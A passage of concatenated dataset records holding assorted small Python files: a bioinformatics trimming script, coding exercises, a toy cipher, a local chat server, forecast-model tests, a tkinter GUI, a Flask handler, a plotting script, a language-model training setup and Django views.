Caiyd\n\"\"\"\n\nimport numpy as np\nimport fire\n\ndef main(infile, outfile):\n name_list = []\n snp_ay = []\n with open(infile) as f:\n header = next(f)\n for line in f:\n line = line.strip().split()\n name_list.append(line[0])\n snp_ay.append(list(line[1]))\n snp_ay = np.array(snp_ay).T\n snp_ay = snp_ay[np.sum(snp_ay != 'N', axis=1) >= 2].T\n snp_ay[snp_ay == 'N'] == '-'\n with open(outfile, 'w') as f:\n f.write(header.split()[0] + '\\t')\n f.write('%s\\n' % snp_ay.shape[1])\n for name, snp in zip(name_list, snp_ay):\n f.write(\"{name: <30}\\t\".format(name=name))\n f.write(\"\".join(snp) + '\\n')\n\n\nif __name__ == '__main__':\n fire.Fire(main)\n\n","sub_path":"snp_tools/phylip_trim.py","file_name":"phylip_trim.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"190350122","text":"#!/usr/bin/env python3\n# coding: utf-8\n\nimport datetime as dt\n\n\nstart = dt.datetime.now()\n\ndef decompose(n):\n m = 2 * n - 1\n for i in range(int(m ** 0.5),int(n ** 0.5),-1):\n result = [n-1,i]\n p = m - i ** 2\n while p:\n result.append(int(p ** 0.5))\n p -= int(p ** 0.5) ** 2\n if len(result) == len(set(result)):\n return result[::-1]\n return None\n\nprint(decompose(44))\n\nend = dt.datetime.now()\nprint(end - start)\n","sub_path":"Learning_files/Python/Unfinished/Square_into_Squares.py","file_name":"Square_into_Squares.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"242685421","text":"import random\n\nalphabet = ['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T',\n 'U','V','W','X','Y','Z','a','b','c','d','e','f','g','h','i','j','k','l','m','n',\n 'o','p','q','r','s','t','u','v','w','x','y','z','Ä','Ö','Ü','ä','ö','ü','0','1',\n '2','3','4','5','6','7','8','9',' ','.',',','?','!',':',';','\\'','-','_','/','+',\n '*','(',')','{','}','[',']','É','È','Ê','é','è','ê','<','>'\n ]\n\n\ndef menu():\n option = int(input('1. Generate random key\\n2. Encrypt with Key\\n3. Decrypt with key\\n4. Exit\\n\\nOption: '))\n if(option == 1):\n key = generateRandomKey()\n try:\n input('Your key is ->{}<-\\nPress ENTER to continue'.format(key))\n except:\n menu()\n elif(option == 2):\n encrypt()\n elif(option == 3):\n decrypt()\n elif(option == 4):\n exit()\n else:\n try:\n input('\\nBad input\\nPress ENTER to go back to the menu: ')\n except:\n menu()\n\ndef generateRandomKey(input_length = -101):\n random_key = ''\n if input_length == -101:\n key_length = int(input('Enter length of key: '))\n else: \n key_length = input_length\n for i in range(0,key_length):\n random_key += random.choice(alphabet)\n return random_key\n\ndef encrypt():\n original_message = str(input('Enter the message, that you want to encrypt: '))\n original_message = original_message\n option_key = int(input('1. Generate key\\n2. Enter given key\\nOption: '))\n encrypt_key = \"\"\n if(option_key == 1):\n encrypt_key = generateRandomKey(len(original_message))\n elif(option_key == 2):\n encrypt_key = str(input('Enter the key to encrypt and decrypt the message: '))\n encrypted_message = ''\n for i in range (0,len(original_message)):\n if original_message[i] not in alphabet:\n print('Caught')\n original_message = original_message[0:i] + '_' + original_message[i+1:len(original_message)]\n new_position = alphabet.index(original_message[i])+alphabet.index(encrypt_key[i%len(encrypt_key)])\n if new_position > len(alphabet)-1:\n new_position = new_position - len(alphabet)\n encrypted_message += alphabet[new_position]\n print('\\nOriginal message: ->{}<-\\nEncrypted message: ->{}<-\\nKey: ->{}<-\\n'.format(original_message,encrypted_message,encrypt_key))\n input('Press enter to continue')\n menu()\n\ndef decrypt():\n encrypted_message = str(input('Enter the message, that you want to decrypt: '))\n encrypted_message = encrypted_message\n encrypt_key = str(input('Enter the key: '))\n original_message = ''\n for i in range (0,len(encrypted_message)):\n new_position = alphabet.index(encrypted_message[i])-alphabet.index(encrypt_key[i%len(encrypt_key)])\n # if new_position < 0:\n # new_position = new_position + len(alphabet)\n original_message += alphabet[new_position]\n \n\n print('\\nOriginal message: ->{}<-\\n'.format(original_message))\n input('Press enter to continue')\n menu()\n\nmenu()\n \n","sub_path":"vigenere.py","file_name":"vigenere.py","file_ext":"py","file_size_in_byte":3129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"120537807","text":"__author__ = 'user'\n\nfrom socketserver import ThreadingTCPServer, StreamRequestHandler\n\nPORT = 2000\nIP = '127.0.0.1'\n\n\nclass MyRequestHandler(StreamRequestHandler):\n def handle(self):\n # 채팅 이용자 체크\n cnt = 0\n conn = self.request\n # 사용자 이름\n name = conn.recv(1024)\n # print('connection from', self.client_address)\n print(name.decode('utf-8') + '님이 입장하셨습니다!')\n # 사용자가 입장했으므로 카운트 증가\n cnt += 1\n while True:\n buf = conn.recv(1024)\n if not buf:\n pass\n # 퇴장\n elif buf.decode('utf-8') == 'EXIT':\n print(name.decode('utf-8') + '님이 퇴장하셨습니다!')\n cnt -= 1\n # 카운트가 0이면 채팅 이용자가 없으므로 서버 종료\n # 서버(스레드) 종료 함수를 잘모르겠다\n # 왠지 shutdown() 함수는 강제종료인것같다\n # 정상 종료 함수 없나?\n if (0 == cnt):\n server.shutdown()\n return\n else:\n # 사용자들이 입력한 문자열을 UTF-8로 인코딩하여 출력\n print(name.decode('utf-8') + ' : ' + buf.decode('utf-8'))\n\n\nserver = ThreadingTCPServer((IP, PORT), MyRequestHandler)\nprint('listening on port', PORT)\nserver.serve_forever()\n# 이 함수가 스레드 종료 함수 아닌가?\n# server.server_close()\n","sub_path":"chatting/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"66972932","text":"from functools import partial\nfrom pathlib import Path\nimport types\n\nimport pandas as pd\n# from pandas.util.testing import assert_series_equal\n\nimport pytest\n\nfrom solarforecastarbiter.io import nwp\nfrom solarforecastarbiter.reference_forecasts import models\n\n\nlatitude = 32.2\nlongitude = -110.9\nelevation = 700\ninit_time = pd.Timestamp('20190515T0000Z')\nstart = pd.Timestamp('20190515T0700Z')\nend_short = pd.Timestamp('20190515T1200Z')\n# gfs is longer, but mixed intervals fails\nend_long = pd.Timestamp('20190520T0000Z')\n\nxfail_g2sub = pytest.mark.xfail(reason='ghi does not exist in g2sub')\n\nBASE_PATH = Path(nwp.__file__).resolve().parents[0] / 'tests/data'\nLOAD_FORECAST = partial(nwp.load_forecast, base_path=BASE_PATH)\n\n\n@pytest.mark.parametrize('model', [\n pytest.param(models.gfs_quarter_deg_3hour_to_hourly_mean,\n marks=pytest.mark.xfail(reason='gfs_3h not available')),\n pytest.param(models.rap_ghi_to_hourly_mean, marks=xfail_g2sub),\n pytest.param(models.rap_ghi_to_instantaneous, marks=xfail_g2sub)\n])\ndef test_default_load_forecast_failures(model):\n model(\n latitude, longitude, elevation, init_time, start, end_long,\n load_forecast=LOAD_FORECAST)\n\n\ndef check_out(out, start, end, end_strict=True):\n # check times\n for o in out[0:5]:\n assert isinstance(o, pd.Series)\n assert o.index[0] == start\n if end_strict:\n assert o.index[-1] == end\n else:\n assert o.index[-1] <= end\n # check irradiance limits\n for o in out[0:3]:\n assert (o >= 0).all() and (o < 1300).all()\n # check temperature limits\n assert (out[3] > -40).all() and (out[3] < 60).all()\n # check wind speed limits\n assert (out[4] >= 0).all() and (out[4] < 60).all()\n # check resampling function\n assert isinstance(out[5], partial)\n assert isinstance(out[6], (types.FunctionType, partial))\n\n\n@pytest.mark.parametrize('model', [\n models.gfs_quarter_deg_hourly_to_hourly_mean,\n models.gfs_quarter_deg_to_hourly_mean,\n models.hrrr_subhourly_to_hourly_mean,\n models.hrrr_subhourly_to_subhourly_instantaneous,\n models.nam_12km_cloud_cover_to_hourly_mean,\n models.nam_12km_hourly_to_hourly_instantaneous,\n models.rap_cloud_cover_to_hourly_mean,\n])\n@pytest.mark.parametrize('end,end_strict', [\n (end_short, True), (end_long, False)\n])\ndef test_models(model, end, end_strict):\n out = model(\n latitude, longitude, elevation, init_time, start, end,\n load_forecast=LOAD_FORECAST)\n check_out(out, start, end, end_strict=end_strict)\n\n\n@pytest.mark.parametrize('start,end', [\n ('20190515T0100Z', '20190520T0000Z'),\n ('20190520T0300Z', '20190522T0000Z'),\n ('20190525T1200Z', '20190531T0000Z'),\n ('20190525T1200Z', '20190531T0000Z'),\n])\ndef test_gfs_quarter_deg_to_hourly_mean(start, end):\n start = pd.Timestamp(start)\n end = pd.Timestamp(end)\n out = models.gfs_quarter_deg_to_hourly_mean(\n latitude, longitude, elevation, init_time, start, end,\n load_forecast=LOAD_FORECAST)\n check_out(out, start, end, end_strict=True)\n\n\n@pytest.mark.parametrize('model', [\n 'hrrr_hourly',\n 'hrrr_subhourly',\n 'gfs_0p25',\n 'rap',\n 'nam_12km'\n])\ndef test_domain_limits(model):\n # test file has longitudes ranging from -110.50 to -110.35\n # at midlatitudes, a degree of longitude is approximately 85 km\n # a 10 degree difference is then 850 km.\n # nwp.load_forecast calls lat/lon look up with max dist of 500 km\n with pytest.raises(ValueError):\n LOAD_FORECAST(latitude, -120.5, init_time, start, end_short, model)\n","sub_path":"solarforecastarbiter/reference_forecasts/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":3601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"6967766","text":"#Comparision of Numbers\r\n\r\n\r\nimport tkinter as tk\r\n\r\nwindow=tk.Tk()\r\nwindow.title(\"Compare numbers\")\r\nwindow.geometry(\"300x300\")\r\n\r\n\r\ndef btn_largest():\r\n num1=txtno1.get()\r\n num2=txtno2.get()\r\n num3=txtno3.get()\r\n\r\n if (num1 > num2) and (num1 > num3):\r\n answer.configure(text=num1)\r\n\r\n elif (num2 > num3) and (num2 > num3):\r\n answer.configure(text=num2)\r\n else:\r\n answer.configure(text=num3)\r\n\r\n\r\ndef btn_smallest():\r\n num1 = txtno1.get()\r\n num2 = txtno2.get()\r\n num3 = txtno3.get()\r\n if (num1 < num2) and (num2 < num3):\r\n answer.configure(text=num1)\r\n\r\n elif (num2 < num3)and (num2 < num3):\r\n answer.configure(text=num2)\r\n else:\r\n answer.configure(text=num3)\r\n\r\n\r\nlblno1 = tk.Label(text=\"NO1\",width=\"6\")\r\nlblno1.grid(columnspan=2,ipadx=\"5\",ipady=\"5\")\r\n\r\nlblno2 = tk.Label(text=\"NO2\",width=\"6\")\r\nlblno2.grid(columnspan=2,ipadx=\"5\",ipady=\"5\")\r\n\r\nlblno3 = tk.Label(text=\"NO3\",width=\"6\")\r\nlblno3.grid(columnspan=2,ipadx=\"5\",ipady=\"5\")\r\n\r\ntxtno1 = tk.Entry(window,width=\"6\")\r\ntxtno1.grid(row=0,column=2,columnspan=2,ipadx=\"5\",ipady=\"5\")\r\n\r\ntxtno2 = tk.Entry(window,width=\"6\")\r\ntxtno2.grid(row=1,column=2,columnspan=2,ipadx=\"5\",ipady=\"5\")\r\n\r\n\r\ntxtno3 = tk.Entry(window,width=\"6\")\r\ntxtno3.grid(row=2,column=2,columnspan=2,ipadx=\"5\",ipady=\"5\")\r\n\r\nbtnlarge = tk.Button(window,text=\" LARGEST\",width=\"3\",command=btn_largest)\r\nbtnlarge.grid(row=3,column=0,ipadx=\"5\",ipady=\"5\")\r\n\r\nbtnsmall = tk.Button(text=\"SMALLEST\",width=\"3\",command=btn_smallest)\r\nbtnsmall.grid(row=3,column=1,ipadx=\"5\",ipady=\"5\")\r\n\r\nanswer = tk.Label(window,text=\"-------\",width=\"6\")\r\nanswer.grid(row=4,column=1,columnspan=2,ipadx=\"5\",ipady=\"5\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nwindow.mainloop()\r\n","sub_path":"Python_Foundation/Comparison_of_Numbers_tkinter.py","file_name":"Comparison_of_Numbers_tkinter.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"2722897","text":"# Created by PyCharm Pro Edition \r\n# User: Kaushik Talukdar \r\n# Date: 24-04-2017 \r\n# Time: 05:03 PM\r\n\r\n# What if we need both Car() & ElectricCar() in this program? Importing both individually will be a long cut if we can\r\n# import the entire module in 1 go.\r\n\r\nimport e_car\r\n\r\nmy_car = e_car.Car(\"Maruti\", \"WagonR\", \"2013\")\r\ncar_name = my_car.get_descriptive_name()\r\nprint(car_name)\r\n\r\nmy_future_car = e_car.ElectricCar(\"Tesla\", \"Model S\", \"2020\")\r\nmy_future_car.check_battery_status()\r\n\r\n","sub_path":"8. Class/14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"65891909","text":"class Solution:\n def isSubsequence(self, s: str, t: str) -> bool:\n #思路 双指针 遍历t跟s,当s跑完,t没跑完就成功,否则失败\n len_s = len(s)\n len_t = len(t)\n #i point to s\n i = 0\n #j point to t\n j = 0\n while i < len_s and j =len_s","sub_path":"Week_03/392. 判断子序列.py","file_name":"392. 判断子序列.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"274019657","text":"# THIS FILE IS SAFE TO EDIT. It will not be overwritten when rerunning go-raml.\nimport os\n\nfrom flask import request, redirect\nfrom ..flask_itsyouonline import requires_auth\n\nimport json as JSON\nimport jsonschema\nfrom jsonschema import Draft4Validator\nfrom ..models import Farmer, Location\nfrom .reverse_geocode import reverse_geocode\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\nFarmer_schema = JSON.load(open(dir_path + '/schema/Farmer_schema.json'))\nFarmer_schema_resolver = jsonschema.RefResolver('file://' + dir_path + '/schema/', Farmer_schema)\nFarmer_schema_validator = Draft4Validator(Farmer_schema, resolver=Farmer_schema_resolver)\n\n\n@requires_auth(org_from_request=True)\ndef RegisterFarmerHandler():\n wallet_addresses = []\n address = request.args.get('walletAddress')\n if address:\n wallet_addresses.append(address)\n \n\n farmer = Farmer(name=request.args['name'], iyo_organization=request.args['organization'], wallet_addresses=wallet_addresses)\n\n farmAddress = request.args.get('farmAddress')\n if farmAddress:\n lat, lng = [float(x.strip()) for x in farmAddress.split(\",\")]\n continent, country, city = reverse_geocode(lat, lng)\n \n if continent and country and city:\n farmer.location = Location()\n farmer.location.country = country\n farmer.location.continent = continent\n farmer.location.city = city\n farmer.location.longitude = lng\n farmer.location.latitude = lat\n\n farmer.save()\n return redirect('/farm_registered')\n","sub_path":"JumpScale9Lib/servers/grid_capacity/server/handlers/RegisterFarmerHandler.py","file_name":"RegisterFarmerHandler.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"442421904","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib.ticker import (MultipleLocator, AutoMinorLocator)\n\nclass Point:\n def __init__(self, seq, rssi, lqi):\n self.seq = seq\n self.rssi = rssi\n self.lqi = lqi\n\nHost1 = '0f2a.7d13.0074.1200'\nHost2 = '0012.4b00.060d.b459'\nHost3 = '0012.4b00.060d.b5f0'\n\nKeyToLook = 'Packet Buffer =>'\nPWD = ''\nRange = 500\n\ndef extractPacketData(filename):\n file_node_lines = filename.readlines()\n node_points_h1 = []\n node_points_h2 = []\n node_points_h3 = []\n\n for line in file_node_lines:\n if (Host1 in line):\n lineAsList = line.split(' ')\n seq = lineAsList[-7]\n rssi = int(lineAsList[-4])\n lqi = int(lineAsList[-1][:2])\n p = Point(seq, rssi, lqi)\n # node_points_h1.append(p)\n node_points_h1.append(rssi)\n elif (Host2 in line):\n lineAsList = line.split(' ')\n seq = lineAsList[-7]\n rssi = int(lineAsList[-4])\n lqi = int(lineAsList[-1][:2])\n p = Point(seq, rssi, lqi)\n # node_points_h2.append(p)\n node_points_h2.append(rssi)\n elif (Host3 in line):\n lineAsList = line.split(' ')\n seq = lineAsList[-7]\n rssi = int(lineAsList[-4])\n lqi = int(lineAsList[-1][:2])\n p = Point(seq, rssi, lqi)\n # node_points_h3.append(p)\n node_points_h3.append(rssi)\n \n return (node_points_h1, node_points_h2, node_points_h3)\n\nFil1 = open('Sky.txt', 'r')\nFil2 = open('Node1.txt', 'r')\nEves = open('Eaves.txt', 'r')\n\n(F1_H1, F1_H2, F1_H3) = extractPacketData(Fil1)\n(F2_H1, F2_H2, F2_H3) = extractPacketData(Fil2)\n(F3_H1, F3_H2, F3_H3) = extractPacketData(Eves)\n\nf, (ax1, ax2) = plt.subplots(1, 2, sharey=True)\n\nf.suptitle(\"Eaves Atenna near Attenuator with -10dBm transmit power\", fontsize=\"x-large\")\n\nax1.plot(F3_H1[:79])\nax1.plot(F2_H1[:79])\nax1.legend(['RSSI @ Eaves node', 'RSSI @ Zolertia'])\nax1.set_title('Transmission from TelosB')\nax1.set_xlabel('Sequence number of packet')\nax1.set_ylabel('RSSI Value')\nax1.grid(True)\nax1.yaxis.set_minor_locator(MultipleLocator(5))\n\nax2.plot(F3_H2[:79])\nax2.plot(F1_H2[:79])\nax2.legend(['RSSI @ Eaves node', 'RSSI @ Telos B'])\nax2.set_title('Transmission from Zolertia')\nax2.set_xlabel('Sequence number of packet')\nax2.set_ylabel('RSSI Value')\nax2.grid(True)\nax2.yaxis.set_minor_locator(MultipleLocator(5))\n\nplt.show()\n","sub_path":"phantom-node-sky_Datalogs/Sky-Near-Junction/dataprocessor.py","file_name":"dataprocessor.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"640339793","text":"\nimport asynctest\n\nfrom opsdroid.message import Message\nfrom opsdroid.connector import Connector\n\n\nclass TestMessage(asynctest.TestCase):\n \"\"\"Test the opsdroid message class.\"\"\"\n\n async def test_message(self):\n mock_connector = Connector({})\n message = Message(\"Hello world\", \"user\", \"default\", mock_connector)\n\n self.assertEqual(message.text, \"Hello world\")\n self.assertEqual(message.user, \"user\")\n self.assertEqual(message.room, \"default\")\n with self.assertRaises(NotImplementedError):\n await message.respond(\"Goodbye world\")\n\n async def test_response_effects(self):\n \"\"\"Responding to a message shouldn't change the message.\"\"\"\n mock_connector = Connector({})\n message_text = \"Hello world\"\n message = Message(message_text, \"user\", \"default\", mock_connector)\n with self.assertRaises(NotImplementedError):\n await message.respond(\"Goodbye world\")\n self.assertEqual(message_text, message.text)\n","sub_path":"tests/test_message.py","file_name":"test_message.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"281128144","text":"import os\n\nimport fastestimator as fe\nimport numpy as np\nimport tensorflow as tf\nimport wget\nfrom fastestimator.op.tensorop.model import ModelOp, UpdateOp\nfrom fastestimator.schedule import cosine_decay\nfrom fastestimator.trace.adapt import LRScheduler\n\n\ndef get_ptb(folder_path, seq_length=64):\n file_names = [\"ptb.train.txt\", \"ptb.valid.txt\", \"ptb.test.txt\"]\n urls = [\n 'https://raw.githubusercontent.com/wojzaremba/lstm/master/data/ptb.train.txt',\n 'https://raw.githubusercontent.com/wojzaremba/lstm/master/data/ptb.valid.txt',\n 'https://raw.githubusercontent.com/wojzaremba/lstm/master/data/ptb.test.txt'\n ]\n # Read text\n texts = []\n for file_name, url in zip(file_names, urls):\n text = []\n file_path = os.path.join(folder_path, file_name)\n if not os.path.exists(file_path):\n wget.download(url, out=folder_path)\n with open(file_path, 'r') as f:\n for line in f:\n text.extend(line.split() + [''])\n texts.append(text)\n # Build dictionary from training data\n vocab = sorted(set(texts[0]))\n word2idx = {u: i for i, u in enumerate(vocab)}\n idx2word = np.array(vocab)\n\n #convert word to index and split the sequences and discard the last incomplete sequence\n data = [[word2idx[word] for word in text[:-(len(text) % seq_length)]] for text in texts]\n train_data, eval_data, test_data = [np.array(d).reshape(-1, seq_length) for d in data]\n return train_data, eval_data, test_data\n\n\nclass CreateInputAndTarget(fe.op.numpyop.NumpyOp):\n def forward(self, data, state):\n x = data\n return x[:-1], x[1:]\n\n\nclass SparseCrossEntropy(fe.op.tensorop.TensorOp):\n def forward(self, data, state):\n y_pred, y = data\n loss = tf.keras.losses.sparse_categorical_crossentropy(y, y_pred, from_logits=True)\n return tf.reduce_mean(loss)\n\n\nclass Perplexity(fe.trace.Trace):\n def on_epoch_end(self, data):\n ce = data[\"ce\"]\n data.write_with_log(self.outputs[0], np.exp(ce))\n\n\ndef build_model(vocab_size, embedding_dim, rnn_units, batch_size):\n model = tf.keras.Sequential([\n tf.keras.layers.Embedding(vocab_size, embedding_dim, batch_input_shape=[batch_size, None]),\n tf.keras.layers.LSTM(rnn_units, return_sequences=True, recurrent_initializer='glorot_uniform'),\n tf.keras.layers.Dropout(0.5),\n tf.keras.layers.Dense(vocab_size)\n ])\n return model\n\n\ndef get_estimator(init_lr, data_dir, seq_length=20, batch_size=128, vocab_size=10000, epochs=98):\n train_data, _, test_data = get_ptb(folder_path=data_dir, seq_length=seq_length + 1)\n pipeline = fe.Pipeline(train_data=fe.dataset.NumpyDataset(data={\"x\": train_data}),\n eval_data=fe.dataset.NumpyDataset(data={\"x\": test_data}),\n batch_size=batch_size,\n ops=CreateInputAndTarget(inputs=\"x\", outputs=(\"x\", \"y\")),\n drop_last=True)\n # step 2\n model = fe.build(model_fn=lambda: build_model(vocab_size, embedding_dim=300, rnn_units=600, batch_size=batch_size),\n optimizer_fn=lambda: tf.optimizers.SGD(init_lr, momentum=0.9)) #1.0, 0.1, 0.01\n network = fe.Network(ops=[\n ModelOp(model=model, inputs=\"x\", outputs=\"y_pred\"),\n SparseCrossEntropy(inputs=(\"y_pred\", \"y\"), outputs=\"ce\"),\n UpdateOp(model=model, loss_name=\"ce\")\n ])\n # step 3\n traces = [\n Perplexity(inputs=\"ce\", outputs=\"perplexity\", mode=\"eval\"),\n LRScheduler(model=model,\n lr_fn=lambda epoch: cosine_decay(epoch, cycle_length=epochs, init_lr=init_lr))\n ]\n\n estimator = fe.Estimator(pipeline=pipeline, network=network, epochs=epochs, traces=traces)\n return estimator","sub_path":"source/normal_compare/language_modeling/cosine_decay.py","file_name":"cosine_decay.py","file_ext":"py","file_size_in_byte":3785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"410947613","text":"# coding: utf-8\n\n# Faça um programa que peça um numero inteiro positivo e em seguida mostre este numero invertido.\n# Exemplo:\n# 12376489\n# => 98467321\n\nn = int(input(\"Digite um número inteiro: \"))\n\nnStr = str(n)\nnStrInvertida = ''\n\nfor i in range(len(nStr)-1, -1, -1):\n nStrInvertida += nStr[i]\n\nnInvertida = int(nStrInvertida)\n\nprint(nInvertida)\n","sub_path":"PythonBrasil/03_EstruturaDeRepeticao/48.py","file_name":"48.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"549867696","text":"from typing import List\n\n\nclass Solution:\n \"\"\"\n 1122. 数组的相对排序\n https://leetcode-cn.com/problems/relative-sort-array/\n 给你两个数组,arr1 和 arr2,\n - arr2 中的元素各不相同\n - arr2 中的每个元素都出现在 arr1 中\n 对 arr1 中的元素进行排序,使 arr1 中项的相对顺序和 arr2 中的相对顺序相同。未在 arr2 中出现过的元素需要按照升序放在 arr1 的末尾。\n \"\"\"\n def relativeSortArray(self, arr1: List[int], arr2: List[int]) -> List[int]:\n cur = 0\n ext = len(arr2)\n for i in arr2:\n for j in range(len(arr1)):\n if i == arr1[j]:\n arr1[cur], arr1[j] = arr1[j], arr1[cur]\n cur += 1\n\n # 快排\n self.sortRange(arr1, cur, len(arr1) - 1)\n return arr1\n\n def sortRange(self, arr, left, right):\n if left < right:\n p = self.position(arr, left, right)\n self.sortRange(arr, left, p - 1)\n self.sortRange(arr, p + 1, right)\n return arr\n\n def position(self, arr, left ,right):\n pivot = left\n idx = pivot + 1\n for i in range(idx, right + 1):\n if arr[i] < arr[pivot]:\n arr[i], arr[idx] = arr[idx], arr[i]\n idx += 1\n\n arr[pivot], arr[idx - 1] = arr[idx - 1], arr[pivot]\n return idx - 1\n\n\nso = Solution()\n# [2,2,2,1,4,3,3,9,6,7,19]\nprint(so.relativeSortArray([2,3,1,3,2,4,6,19,9,2,7, 12, 10, 7], [2,1,4,3,9,6]))\n","sub_path":"sort.relative-sort-array.py","file_name":"sort.relative-sort-array.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"515339982","text":"# Create your views here.\n\nfrom .models import DematSum\n\nfrom django.views.generic.list import ListView\n\nfrom django.db.models import OuterRef, Subquery, Count, Sum\nfrom django.db.models.functions import Trim, Lower, Round\n\nfrom django_gotolong.amfi.models import Amfi\nfrom django_gotolong.greco.models import Greco\n\nimport pandas as pd\nimport csv, io\nimport openpyxl\nfrom django.contrib import messages\nfrom django.urls import reverse\nfrom django.http import HttpResponseRedirect\n\nfrom django_gotolong.lastrefd.models import Lastrefd, lastrefd_update\n\n\nclass DematSumListView(ListView):\n model = DematSum\n\n # if pagination is desired\n # paginate_by = 300\n\n queryset = DematSum.objects.all()\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n return context\n\n\nclass DematSumTickerView(ListView):\n model = DematSum\n\n # if pagination is desired\n # paginate_by = 300\n\n # select required columns instead of all columns\n queryset = DematSum.objects.values('stock_symbol')\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n return context\n\n\nclass DematSumRankView(ListView):\n # model = DematSum\n\n # if pagination is desired\n # paginate_by = 300\n\n # amfi_qset = Amfi.objects.filter(comp_isin=OuterRef('pk'))\n # queryset = DematSum.objects.annotate(comp_rank=Subquery(amfi_qset.values('comp_rank'))).order_by('comp_rank')\n # queryset = DematSum.objects.annotate(comp_rank=Subquery(amfi_qset.values('comp_rank')))\n amfi_qs = Amfi.objects.filter(comp_isin=OuterRef(\"isin_code_id\"))\n queryset = DematSum.objects.all(). \\\n annotate(comp_rank=Subquery(amfi_qs.values('comp_rank')[:1])). \\\n annotate(cap_type=Lower(Trim(Subquery(amfi_qs.values('cap_type')[:1])))). \\\n values('stock_symbol', 'comp_name', 'value_cost', 'comp_rank', 'cap_type'). \\\n order_by('comp_rank')\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n return context\n\n\nclass DematSumRecoView(ListView):\n # model = DematSum\n\n # if pagination is desired\n # paginate_by = 300\n\n # amfi_qset = Amfi.objects.filter(comp_isin=OuterRef('pk'))\n # queryset = DematSum.objects.annotate(comp_rank=Subquery(amfi_qset.values('comp_rank'))).order_by('comp_rank')\n # queryset = DematSum.objects.annotate(comp_rank=Subquery(amfi_qset.values('comp_rank')))\n amfi_qs = Amfi.objects.filter(comp_isin=OuterRef(\"isin_code_id\"))\n greco_qs = Greco.objects.filter(reco_isin=OuterRef(\"isin_code_id\"))\n queryset = DematSum.objects.all(). \\\n annotate(comp_rank=Subquery(amfi_qs.values('comp_rank')[:1])). \\\n annotate(cap_type=Lower(Trim(Subquery(amfi_qs.values('cap_type')[:1])))). \\\n annotate(reco_type=Subquery(greco_qs.values('reco_type')[:1])). \\\n annotate(reco_cause=Subquery(greco_qs.values('reco_cause')[:1])). \\\n values('stock_symbol', 'comp_name', 'value_cost', 'comp_rank', 'cap_type', 'reco_type',\n 'reco_cause'). \\\n order_by('comp_rank')\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n return context\n\n\nclass DematSumAmountView(ListView):\n # model = DematSum\n\n # if pagination is desired\n # paginate_by = 300\n\n # amfi_qset = Amfi.objects.filter(comp_isin=OuterRef('pk'))\n # queryset = DematSum.objects.annotate(comp_rank=Subquery(amfi_qset.values('comp_rank'))).order_by('comp_rank')\n # queryset = DematSum.objects.annotate(comp_rank=Subquery(amfi_qset.values('comp_rank')))\n queryset = DematSum.objects.all(). \\\n values('comp_name', 'value_cost'). \\\n order_by('-value_cost')\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n return context\n\n\nclass DematSumCapTypeView(ListView):\n # model = DematSum\n\n # if pagination is desired\n # paginate_by = 300\n\n # amfi_qset = Amfi.objects.filter(comp_isin=OuterRef('pk'))\n # queryset = DematSum.objects.annotate(comp_rank=Subquery(amfi_qset.values('comp_rank'))).order_by('comp_rank')\n # queryset = DematSum.objects.annotate(comp_rank=Subquery(amfi_qset.values('comp_rank')))\n amfi_qs = Amfi.objects.filter(comp_isin=OuterRef(\"isin_code_id\"))\n queryset = DematSum.objects.all(). \\\n annotate(comp_rank=Subquery(amfi_qs.values('comp_rank')[:1])). \\\n annotate(cap_type=Lower(Trim(Subquery(amfi_qs.values('cap_type')[:1])))). \\\n values('cap_type'). \\\n annotate(cap_count=Count('cap_type')). \\\n annotate(cap_cost=Round(Sum('value_cost'))). \\\n order_by('cap_type')\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n return context\n\n\n# one parameter named request\ndef dematsum_upload(request):\n # for quick debugging\n #\n # import pdb; pdb.set_trace()\n #\n # breakpoint()\n\n debug_level = 1\n # declaring template\n template = \"dematsum/dematsum_list.html\"\n data = DematSum.objects.all()\n\n # GET request returns the value of the data with the specified key.\n if request.method == \"GET\":\n return render(request, template)\n\n req_file = request.FILES['file']\n\n # let's check if it is a csv file\n\n if req_file.name.endswith('.xls') or req_file.name.endswith('.xlsx'):\n 